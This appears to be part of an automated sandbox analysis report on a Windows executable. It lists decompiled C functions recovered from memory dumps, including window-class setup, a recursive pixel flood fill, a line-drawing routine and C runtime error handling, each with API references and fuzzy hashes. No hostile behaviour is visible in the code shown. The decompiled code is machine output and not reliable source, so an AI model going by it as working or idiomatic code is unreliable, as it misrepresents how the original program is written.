                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: PaintRect$BeginClientColorInvalidateProcTextWindow
                                              • String ID:
                                              • API String ID: 418155164-0
                                              • Opcode ID: a6774af14a743247c02e119c0ffce8c76c9234e08a3b2cff9041a5a3e0e6f69f
                                              • Instruction ID: d817a1c520401e4848020557dd21a7e30cfadc2a703c4f349b5aed0617e41e0b
                                              • Opcode Fuzzy Hash: a6774af14a743247c02e119c0ffce8c76c9234e08a3b2cff9041a5a3e0e6f69f
                                              • Instruction Fuzzy Hash: 4021517565020CFBDB14CFA4EC49FEE7B79AB48750F108518FA099B290D7709A50CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC4C0(struct HINSTANCE__* _a8) {
                                              				struct _WNDCLASSEXW _v52;
                                              				void* _t19;
                                              
                                              				_v52.cbSize = 0;
                                              				E002F1D00(_t19,  &(_v52.style), 0, 0x2c);
                                              				_v52.cbSize = 0x30;
                                              				_v52.lpfnWndProc = E002FD400;
                                              				_v52.hInstance = _a8;
                                              				_v52.hbrBackground = GetSysColorBrush(0xf);
                                              				_v52.lpszClassName = L"SAVEBOXCLASS";
                                              				RegisterClassExW( &_v52);
                                              				return CreateWindowExW(9, L"SAVEBOXCLASS", 0x3049d8, 0x10c80000, 0x64, 0x64, 0xc8, 0xc8, 0, 0, _a8, 0);
                                              			}





                                              0x002fc4c6
                                              0x002fc4d5
                                              0x002fc4dd
                                              0x002fc4e4
                                              0x002fc4ee
                                              0x002fc4f9
                                              0x002fc4fc
                                              0x002fc507
                                              0x002fc53f

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FC4F3
                                              • RegisterClassExW.USER32 ref: 002FC507
                                              • CreateWindowExW.USER32 ref: 002FC536
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: BrushClassColorCreateRegisterWindow
                                              • String ID: 0$SAVEBOXCLASS$SAVEBOXCLASS
                                              • API String ID: 4191210197-2091478518
                                              • Opcode ID: 108b436e078b864566325f8a4348c78ad8a32f0d04c11a570a94d9aeb92a2868
                                              • Instruction ID: d72286a97e308a44f03ceadae57f97fbe2c9e182a024b2b7abe425f39409cddb
                                              • Opcode Fuzzy Hash: 108b436e078b864566325f8a4348c78ad8a32f0d04c11a570a94d9aeb92a2868
                                              • Instruction Fuzzy Hash: 900181B4A80308BBFB109F90EC4AFAEBB74AB04B14F004125FB147A2C0D7F01614CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC550(struct HINSTANCE__* _a8) {
                                              				struct _WNDCLASSEXW _v52;
                                              				void* _t19;
                                              
                                              				_v52.cbSize = 0;
                                              				E002F1D00(_t19,  &(_v52.style), 0, 0x2c);
                                              				_v52.cbSize = 0x30;
                                              				_v52.lpfnWndProc = E002FD620;
                                              				_v52.hInstance = _a8;
                                              				_v52.hbrBackground = GetSysColorBrush(0xf);
                                              				_v52.lpszClassName = L"CGBOXCLASS";
                                              				RegisterClassExW( &_v52);
                                              				return CreateWindowExW(9, L"CGBOXCLASS", 0x30498c, 0x10c80000, 0x64, 0x64, 0xc8, 0xc8, 0, 0, _a8, 0);
                                              			}





                                              0x002fc556
                                              0x002fc565
                                              0x002fc56d
                                              0x002fc574
                                              0x002fc57e
                                              0x002fc589
                                              0x002fc58c
                                              0x002fc597
                                              0x002fc5cf

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FC583
                                              • RegisterClassExW.USER32 ref: 002FC597
                                              • CreateWindowExW.USER32 ref: 002FC5C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: BrushClassColorCreateRegisterWindow
                                              • String ID: 0$CGBOXCLASS$CGBOXCLASS
                                              • API String ID: 4191210197-2424895175
                                              • Opcode ID: 1fdabf13456a7965bb9e5a2dbe71ea291939cc03a16fd2385a04af9bf94c8e6a
                                              • Instruction ID: f296cf72a13b8ee4a4f384898086c91cba9a8add45422f9261ccb58c9d8a0b08
                                              • Opcode Fuzzy Hash: 1fdabf13456a7965bb9e5a2dbe71ea291939cc03a16fd2385a04af9bf94c8e6a
                                              • Instruction Fuzzy Hash: 270181B4A90308BBFB109F90EC4AFAEBB78AB04B04F004124FB147A2C1D7F01614CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC5E0(struct HINSTANCE__* _a12) {
                                              				struct _WNDCLASSEXW _v52;
                                              				void* _t19;
                                              
                                              				_v52.cbSize = 0;
                                              				E002F1D00(_t19,  &(_v52.style), 0, 0x2c);
                                              				_v52.cbSize = 0x30;
                                              				_v52.lpfnWndProc = E002FD5A0;
                                              				_v52.hInstance = _a12;
                                              				_v52.hbrBackground = GetSysColorBrush(0xf);
                                              				_v52.lpszClassName = L"DialogClass";
                                              				RegisterClassExW( &_v52);
                                              				return CreateWindowExW(9, L"DialogClass", 0x30494c, 0x10c80000, 0x64, 0x64, 0xc8, 0x96, 0, 0, _a12, 0);
                                              			}





                                              0x002fc5e6
                                              0x002fc5f5
                                              0x002fc5fd
                                              0x002fc604
                                              0x002fc60e
                                              0x002fc619
                                              0x002fc61c
                                              0x002fc627
                                              0x002fc65f

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FC613
                                              • RegisterClassExW.USER32 ref: 002FC627
                                              • CreateWindowExW.USER32 ref: 002FC656
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: BrushClassColorCreateRegisterWindow
                                              • String ID: 0$DialogClass$DialogClass
                                              • API String ID: 4191210197-3050871603
                                              • Opcode ID: 5a559c4c7d1434afbb70a9803734c39ec08d4add737a28d751fc292d776b6a1a
                                              • Instruction ID: d31833288f25d2d369a6ac2c36c5039dcea7e008dad5135fe880e130d6cc2686
                                              • Opcode Fuzzy Hash: 5a559c4c7d1434afbb70a9803734c39ec08d4add737a28d751fc292d776b6a1a
                                              • Instruction Fuzzy Hash: A50181B0A90308BBEB109F90EC5AFAFBB74AB04B44F500424FB147A2C1D7F15524CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FB540(void* __eflags, struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                              				intOrPtr _v8;
                                              				long _v12;
                                              				int _v16;
                                              				int _v20;
                                              				int _v24;
                                              				int _v28;
                                              				int _v32;
                                              				int _v36;
                                              				int _v40;
                                              				int _t219;
                                              				int _t225;
                                              				int _t231;
                                              				int _t237;
                                              				int _t243;
                                              
                                              				_v16 = E002FB8A0(_a12, _a4, _a8, _a12, _a20);
                                              				_v8 = E002FB840(_a4, _a4, _a8, _a12, _a20);
                                              				E002FBE50(_a4, _a4, _v16, _a12, _v8, _a12, _a16, _a36, 1, 0);
                                              				if(_a32 != 1) {
                                              					_v28 = _v16;
                                              					while(1) {
                                              						__eflags = _v28 - _v8;
                                              						if(_v28 > _v8) {
                                              							goto L20;
                                              						}
                                              						_v12 = GetPixel(_a4, _v28, _a12 - 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 - 1;
                                              							_v28 = E002FB540(_a12 - 1, _a4, _v28, _a12 - 1, _a16, _a20, _v16, _v8, 2, _a36);
                                              						}
                                              						_t237 = _v28 + 1;
                                              						__eflags = _t237;
                                              						_v28 = _t237;
                                              					}
                                              				} else {
                                              					_v20 = _v16;
                                              					while(_v20 < _a24) {
                                              						_v12 = GetPixel(_a4, _v20, _a12 - 1);
                                              						if(_v12 == _a20) {
                                              							_v20 = E002FB540(_a12 - 1, _a4, _v20, _a12 - 1, _a16, _a20, _v16, _v8, 2, _a36);
                                              						}
                                              						_v20 = _v20 + 1;
                                              					}
                                              					_v24 = _a28 + 1;
                                              					while(1) {
                                              						__eflags = _v24 - _v8;
                                              						if(_v24 > _v8) {
                                              							break;
                                              						}
                                              						_v12 = GetPixel(_a4, _v24, _a12 - 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 - 1;
                                              							_v24 = E002FB540(_a12 - 1, _a4, _v24, _a12 - 1, _a16, _a20, _v16, _v8, 2, _a36);
                                              						}
                                              						_t243 = _v24 + 1;
                                              						__eflags = _t243;
                                              						_v24 = _t243;
                                              					}
                                              				}
                                              				L20:
                                              				__eflags = _a32 - 2;
                                              				if(_a32 != 2) {
                                              					_v40 = _v16;
                                              					while(1) {
                                              						__eflags = _v40 - _v8;
                                              						if(_v40 > _v8) {
                                              							goto L40;
                                              						}
                                              						_v12 = GetPixel(_a4, _v40, _a12 + 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 + 1;
                                              							_v40 = E002FB540(_a12 + 1, _a4, _v40, _a12 + 1, _a16, _a20, _v16, _v8, 1, _a36);
                                              						}
                                              						_t219 = _v40 + 1;
                                              						__eflags = _t219;
                                              						_v40 = _t219;
                                              					}
                                              				} else {
                                              					_v32 = _v16;
                                              					while(1) {
                                              						__eflags = _v32 - _a24;
                                              						if(_v32 >= _a24) {
                                              							break;
                                              						}
                                              						_v12 = GetPixel(_a4, _v32, _a12 + 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 + 1;
                                              							_v32 = E002FB540(_a12 + 1, _a4, _v32, _a12 + 1, _a16, _a20, _v16, _v8, 1, _a36);
                                              						}
                                              						_t231 = _v32 + 1;
                                              						__eflags = _t231;
                                              						_v32 = _t231;
                                              					}
                                              					_v36 = _a28 + 1;
                                              					while(1) {
                                              						__eflags = _v36 - _v8;
                                              						if(_v36 > _v8) {
                                              							break;
                                              						}
                                              						_v12 = GetPixel(_a4, _v36, _a12 + 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 + 1;
                                              							_v36 = E002FB540(_a12 + 1, _a4, _v36, _a12 + 1, _a16, _a20, _v16, _v8, 1, _a36);
                                              						}
                                              						_t225 = _v36 + 1;
                                              						__eflags = _t225;
                                              						_v36 = _t225;
                                              					}
                                              				}
                                              				L40:
                                              				return _v8;
                                              			}

















                                              0x002fb55b
                                              0x002fb573
                                              0x002fb596
                                              0x002fb59f
                                              0x002fb67d
                                              0x002fb68b
                                              0x002fb68e
                                              0x002fb691
                                              0x00000000
                                              0x00000000
                                              0x002fb6a8
                                              0x002fb6ae
                                              0x002fb6b1
                                              0x002fb6cc
                                              0x002fb6dd
                                              0x002fb6dd
                                              0x002fb685
                                              0x002fb685
                                              0x002fb688
                                              0x002fb688
                                              0x002fb5a5
                                              0x002fb5a8
                                              0x002fb5b6
                                              0x002fb5d3
                                              0x002fb5dc
                                              0x002fb608
                                              0x002fb608
                                              0x002fb5b3
                                              0x002fb5b3
                                              0x002fb613
                                              0x002fb621
                                              0x002fb624
                                              0x002fb627
                                              0x00000000
                                              0x00000000
                                              0x002fb63e
                                              0x002fb644
                                              0x002fb647
                                              0x002fb662
                                              0x002fb673
                                              0x002fb673
                                              0x002fb61b
                                              0x002fb61b
                                              0x002fb61e
                                              0x002fb61e
                                              0x002fb678
                                              0x002fb6e2
                                              0x002fb6e2
                                              0x002fb6e6
                                              0x002fb7c4
                                              0x002fb7d2
                                              0x002fb7d5
                                              0x002fb7d8
                                              0x00000000
                                              0x00000000
                                              0x002fb7ef
                                              0x002fb7f5
                                              0x002fb7f8
                                              0x002fb813
                                              0x002fb824
                                              0x002fb824
                                              0x002fb7cc
                                              0x002fb7cc
                                              0x002fb7cf
                                              0x002fb7cf
                                              0x002fb6ec
                                              0x002fb6ef
                                              0x002fb6fd
                                              0x002fb700
                                              0x002fb703
                                              0x00000000
                                              0x00000000
                                              0x002fb71a
                                              0x002fb720
                                              0x002fb723
                                              0x002fb73e
                                              0x002fb74f
                                              0x002fb74f
                                              0x002fb6f7
                                              0x002fb6f7
                                              0x002fb6fa
                                              0x002fb6fa
                                              0x002fb75a
                                              0x002fb768
                                              0x002fb76b
                                              0x002fb76e
                                              0x00000000
                                              0x00000000
                                              0x002fb785
                                              0x002fb78b
                                              0x002fb78e
                                              0x002fb7a9
                                              0x002fb7ba
                                              0x002fb7ba
                                              0x002fb762
                                              0x002fb762
                                              0x002fb765
                                              0x002fb765
                                              0x002fb7bf
                                              0x002fb829
                                              0x002fb82f

                                              APIs
                                                • Part of subcall function 002FB8A0: GetPixel.GDI32(?,?,?), ref: 002FB8B0
                                                • Part of subcall function 002FB8A0: GetPixel.GDI32(?,00000000,?), ref: 002FB8DC
                                                • Part of subcall function 002FB840: GetPixel.GDI32(?,?,?), ref: 002FB850
                                                • Part of subcall function 002FB840: GetPixel.GDI32(?,00000000,?), ref: 002FB87C
                                                • Part of subcall function 002FBE50: GetPixel.GDI32(?,?,?), ref: 002FBF17
                                                • Part of subcall function 002FBE50: SetPixel.GDI32(?,?,?,?), ref: 002FBF70
                                              • GetPixel.GDI32(?,?,?), ref: 002FB5CD
                                              • GetPixel.GDI32(?,?,?), ref: 002FB638
                                              • GetPixel.GDI32(?,?,?), ref: 002FB6A2
                                              • GetPixel.GDI32(?,?,?), ref: 002FB714
                                              • GetPixel.GDI32(?,?,?), ref: 002FB77F
                                              • GetPixel.GDI32(?,00000002,?), ref: 002FB7E9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Pixel
                                              • String ID:
                                              • API String ID: 3195210534-0
                                              • Opcode ID: 2dc2cb511149c18bf997bf798e3da9303b98d1534867cc9ef9053b7d7ff87a04
                                              • Instruction ID: 84eee227279c03e216b0146c3de50c88661ca7c9e1f35c8677ee7137d04025a6
                                              • Opcode Fuzzy Hash: 2dc2cb511149c18bf997bf798e3da9303b98d1534867cc9ef9053b7d7ff87a04
                                              • Instruction Fuzzy Hash: 16C182B5A1410DAFCF05CF98D991DEFB7BABB88380F208558F619E7244D730A951CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E002FBE50(signed int __edx, struct HDC__* _a4, void* _a8, void* _a12, signed int _a16, signed int _a20, long _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                              				intOrPtr _v8;
                                              				int _v12;
                                              				int _v16;
                                              				int _v20;
                                              				int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				intOrPtr _v36;
                                              				intOrPtr _v40;
                                              				intOrPtr _v44;
                                              				int _t144;
                                              				int _t166;
                                              				signed int _t220;
                                              				signed int _t237;
                                              
                                              				asm("cdq");
                                              				asm("cdq");
                                              				if((_a16 - _a8 ^ __edx) - __edx >= (_a20 - _a12 ^ __edx) - __edx) {
                                              					if(_a8 > _a16) {
                                              						E002FC490( &_a8,  &_a8,  &_a16);
                                              						E002FC490( &_a8,  &_a12,  &_a20);
                                              					}
                                              					_v20 = _a12;
                                              					_t237 = _a20;
                                              					if(_t237 <= _a12) {
                                              						_v40 = 0xffffffff;
                                              					} else {
                                              						_v40 = 1;
                                              					}
                                              					_v36 = _v40;
                                              					_v32 = _a16 - _a8;
                                              					asm("cdq");
                                              					_v28 = (_a20 - _a12 ^ _t237) - _t237;
                                              					_v8 = (_v28 << 1) - _v32;
                                              					_t166 = _a8;
                                              					_v12 = _t166;
                                              					while(_v12 <= _a16) {
                                              						if(_a32 != 0) {
                                              							if(_a36 != 0) {
                                              								E002FC390(_v12, _a28, _v12, _v20, 0xffffff - GetPixel(_a4, _v12, _v20), _a24);
                                              							} else {
                                              								E002FC390(_v20, _a28, _v12, _v20, GetPixel(_a4, _v12, _v20), _a24);
                                              							}
                                              						}
                                              						SetPixel(_a4, _v12, _v20, _a24);
                                              						if(_v8 <= 0) {
                                              							_t166 = _v8;
                                              							_v8 = _t166 + _v28 * 2;
                                              						} else {
                                              							_v20 = _v20 + _v36;
                                              							_t166 = _v8;
                                              							_v8 = _t166 + (_v28 - _v32) * 2;
                                              						}
                                              						_v12 = _v12 + 1;
                                              					}
                                              					return _t166;
                                              				}
                                              				if(_a12 > _a20) {
                                              					E002FC490( &_a8,  &_a8,  &_a16);
                                              					E002FC490( &_a8,  &_a12,  &_a20);
                                              				}
                                              				_v24 = _a8;
                                              				_t220 = _a16;
                                              				if(_t220 <= _a8) {
                                              					_v44 = 0xffffffff;
                                              				} else {
                                              					_v44 = 1;
                                              				}
                                              				_v36 = _v44;
                                              				asm("cdq");
                                              				_v32 = (_a16 - _a8 ^ _t220) - _t220;
                                              				_v28 = _a20 - _a12;
                                              				_v8 = (_v32 << 1) - _v28;
                                              				_t144 = _a12;
                                              				_v16 = _t144;
                                              				while(_v16 <= _a20) {
                                              					if(_a32 != 0) {
                                              						if(_a36 != 0) {
                                              							E002FC390(_v24, _a28, _v24, _v16, 0xffffff - GetPixel(_a4, _v24, _v16), _a24);
                                              						} else {
                                              							E002FC390(_v16, _a28, _v24, _v16, GetPixel(_a4, _v24, _v16), _a24);
                                              						}
                                              					}
                                              					SetPixel(_a4, _v24, _v16, _a24);
                                              					if(_v8 <= 0) {
                                              						_t144 = _v8;
                                              						_v8 = _t144 + _v32 * 2;
                                              					} else {
                                              						_v24 = _v24 + _v36;
                                              						_t144 = _v8;
                                              						_v8 = _t144 + (_v32 - _v28) * 2;
                                              					}
                                              					_v16 = _v16 + 1;
                                              				}
                                              				return _t144;
                                              			}

















                                              0x002fbe5c
                                              0x002fbe69
                                              0x002fbe70
                                              0x002fbe7c
                                              0x002fbe86
                                              0x002fbe93
                                              0x002fbe93
                                              0x002fbe9b
                                              0x002fbe9e
                                              0x002fbea4
                                              0x002fbeaf
                                              0x002fbea6
                                              0x002fbea6
                                              0x002fbea6
                                              0x002fbeb9
                                              0x002fbec2
                                              0x002fbecb
                                              0x002fbed0
                                              0x002fbedb
                                              0x002fbede
                                              0x002fbee1
                                              0x002fbeef
                                              0x002fbeff
                                              0x002fbf05
                                              0x002fbf5b
                                              0x002fbf07
                                              0x002fbf2a
                                              0x002fbf2a
                                              0x002fbf05
                                              0x002fbf70
                                              0x002fbf7a
                                              0x002fbf99
                                              0x002fbf9f
                                              0x002fbf7c
                                              0x002fbf82
                                              0x002fbf8b
                                              0x002fbf91
                                              0x002fbf91
                                              0x002fbeec
                                              0x002fbeec
                                              0x00000000
                                              0x002fbeef
                                              0x002fbfb2
                                              0x002fbfbc
                                              0x002fbfc9
                                              0x002fbfc9
                                              0x002fbfd1
                                              0x002fbfd4
                                              0x002fbfda
                                              0x002fbfe5
                                              0x002fbfdc
                                              0x002fbfdc
                                              0x002fbfdc
                                              0x002fbfef
                                              0x002fbff8
                                              0x002fbffd
                                              0x002fc006
                                              0x002fc011
                                              0x002fc014
                                              0x002fc017
                                              0x002fc025
                                              0x002fc035
                                              0x002fc03b
                                              0x002fc091
                                              0x002fc03d
                                              0x002fc060
                                              0x002fc060
                                              0x002fc03b
                                              0x002fc0a6
                                              0x002fc0b0
                                              0x002fc0cf
                                              0x002fc0d5
                                              0x002fc0b2
                                              0x002fc0b8
                                              0x002fc0c1
                                              0x002fc0c7
                                              0x002fc0c7
                                              0x002fc022
                                              0x002fc022
                                              0x002fc0e0

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Pixel
                                              • String ID:
                                              • API String ID: 3195210534-0
                                              • Opcode ID: 6b6753c74ed91656936779d769e3e57e52ab650e99f8c92b68de4e2b899f9a12
                                              • Instruction ID: 6a785ede1eba339b2014bad133933df3fb7f348c7f212a7d292d23856202fccb
                                              • Opcode Fuzzy Hash: 6b6753c74ed91656936779d769e3e57e52ab650e99f8c92b68de4e2b899f9a12
                                              • Instruction Fuzzy Hash: 03A1B775A1010EEFCF04CFA8C9949EEB7B6BF48340F208659FA15A7254D734AA51CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 72%
                                              			E002F3BE2(void* __ebx, void* __ecx, void* __edx) {
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr _t2;
                                              				void* _t3;
                                              				void* _t4;
                                              				intOrPtr _t9;
                                              				void* _t11;
                                              				void* _t20;
                                              				void* _t21;
                                              				void* _t23;
                                              				void* _t25;
                                              				void* _t27;
                                              				void* _t29;
                                              				void* _t31;
                                              				void* _t32;
                                              				long _t36;
                                              				long _t37;
                                              				void* _t40;
                                              
                                              				_t29 = __edx;
                                              				_t23 = __ecx;
                                              				_t20 = __ebx;
                                              				_t36 = GetLastError();
                                              				_t2 =  *0x304044; // 0x7
                                              				_t42 = _t2 - 0xffffffff;
                                              				if(_t2 == 0xffffffff) {
                                              					L2:
                                              					_t3 = E002F3727(_t23, 1, 0x364);
                                              					_t31 = _t3;
                                              					_pop(_t25);
                                              					if(_t31 != 0) {
                                              						_t4 = E002F51C1(_t25, _t36, __eflags,  *0x304044, _t31);
                                              						__eflags = _t4;
                                              						if(_t4 != 0) {
                                              							E002F3A54(_t25, _t31, "xE0");
                                              							E002F365C(0);
                                              							_t40 = _t40 + 0xc;
                                              							__eflags = _t31;
                                              							if(_t31 == 0) {
                                              								goto L9;
                                              							} else {
                                              								goto L8;
                                              							}
                                              						} else {
                                              							_push(_t31);
                                              							goto L4;
                                              						}
                                              					} else {
                                              						_push(_t3);
                                              						L4:
                                              						E002F365C();
                                              						_pop(_t25);
                                              						L9:
                                              						SetLastError(_t36);
                                              						E002F36E4(_t20, _t29, _t31, _t36);
                                              						asm("int3");
                                              						_push(_t20);
                                              						_push(_t36);
                                              						_push(_t31);
                                              						_t37 = GetLastError();
                                              						_t21 = 0;
                                              						_t9 =  *0x304044; // 0x7
                                              						_t45 = _t9 - 0xffffffff;
                                              						if(_t9 == 0xffffffff) {
                                              							L12:
                                              							_t32 = E002F3727(_t25, 1, 0x364);
                                              							_pop(_t27);
                                              							if(_t32 != 0) {
                                              								_t11 = E002F51C1(_t27, _t37, __eflags,  *0x304044, _t32);
                                              								__eflags = _t11;
                                              								if(_t11 != 0) {
                                              									E002F3A54(_t27, _t32, "xE0");
                                              									E002F365C(_t21);
                                              									__eflags = _t32;
                                              									if(_t32 != 0) {
                                              										goto L19;
                                              									} else {
                                              										goto L18;
                                              									}
                                              								} else {
                                              									_push(_t32);
                                              									goto L14;
                                              								}
                                              							} else {
                                              								_push(_t21);
                                              								L14:
                                              								E002F365C();
                                              								L18:
                                              								SetLastError(_t37);
                                              							}
                                              						} else {
                                              							_t32 = E002F516B(_t25, _t37, _t45, _t9);
                                              							if(_t32 != 0) {
                                              								L19:
                                              								SetLastError(_t37);
                                              								_t21 = _t32;
                                              							} else {
                                              								goto L12;
                                              							}
                                              						}
                                              						return _t21;
                                              					}
                                              				} else {
                                              					_t31 = E002F516B(_t23, _t36, _t42, _t2);
                                              					if(_t31 != 0) {
                                              						L8:
                                              						SetLastError(_t36);
                                              						return _t31;
                                              					} else {
                                              						goto L2;
                                              					}
                                              				}
                                              			}





















                                              0x002f3be2
                                              0x002f3be2
                                              0x002f3be2
                                              0x002f3bec
                                              0x002f3bee
                                              0x002f3bf3
                                              0x002f3bf6
                                              0x002f3c04
                                              0x002f3c0b
                                              0x002f3c10
                                              0x002f3c13
                                              0x002f3c16
                                              0x002f3c28
                                              0x002f3c2d
                                              0x002f3c2f
                                              0x002f3c3a
                                              0x002f3c41
                                              0x002f3c46
                                              0x002f3c49
                                              0x002f3c4b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f3c31
                                              0x002f3c31
                                              0x00000000
                                              0x002f3c31
                                              0x002f3c18
                                              0x002f3c18
                                              0x002f3c19
                                              0x002f3c19
                                              0x002f3c1e
                                              0x002f3c59
                                              0x002f3c5a
                                              0x002f3c60
                                              0x002f3c65
                                              0x002f3c68
                                              0x002f3c69
                                              0x002f3c6a
                                              0x002f3c71
                                              0x002f3c73
                                              0x002f3c75
                                              0x002f3c7a
                                              0x002f3c7d
                                              0x002f3c8b
                                              0x002f3c97
                                              0x002f3c9a
                                              0x002f3c9d
                                              0x002f3caf
                                              0x002f3cb4
                                              0x002f3cb6
                                              0x002f3cc1
                                              0x002f3cc7
                                              0x002f3ccf
                                              0x002f3cd1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f3cb8
                                              0x002f3cb8
                                              0x00000000
                                              0x002f3cb8
                                              0x002f3c9f
                                              0x002f3c9f
                                              0x002f3ca0
                                              0x002f3ca0
                                              0x002f3cd3
                                              0x002f3cd4
                                              0x002f3cd4
                                              0x002f3c7f
                                              0x002f3c85
                                              0x002f3c89
                                              0x002f3cdc
                                              0x002f3cdd
                                              0x002f3ce3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f3c89
                                              0x002f3cea
                                              0x002f3cea
                                              0x002f3bf8
                                              0x002f3bfe
                                              0x002f3c02
                                              0x002f3c4d
                                              0x002f3c4e
                                              0x002f3c58
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002f3c02

                                              APIs
                                              • GetLastError.KERNEL32(?,?,002F3631,00302EE8,0000000C,002F1767), ref: 002F3BE6
                                              • SetLastError.KERNEL32(00000000), ref: 002F3C4E
                                              • SetLastError.KERNEL32(00000000), ref: 002F3C5A
                                              • _abort.LIBCMT ref: 002F3C60
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ErrorLast$_abort
                                              • String ID: xE0
                                              • API String ID: 88804580-242510614
                                              • Opcode ID: 90fce05cf2361d9775bc9f0dac523b89fbd8116222fc3253ece204ca4f1a7e5f
                                              • Instruction ID: fd68f21a4895db3324e63b5639dc0b848790f6fba8b2d7fa8b8003bbf98aeb51
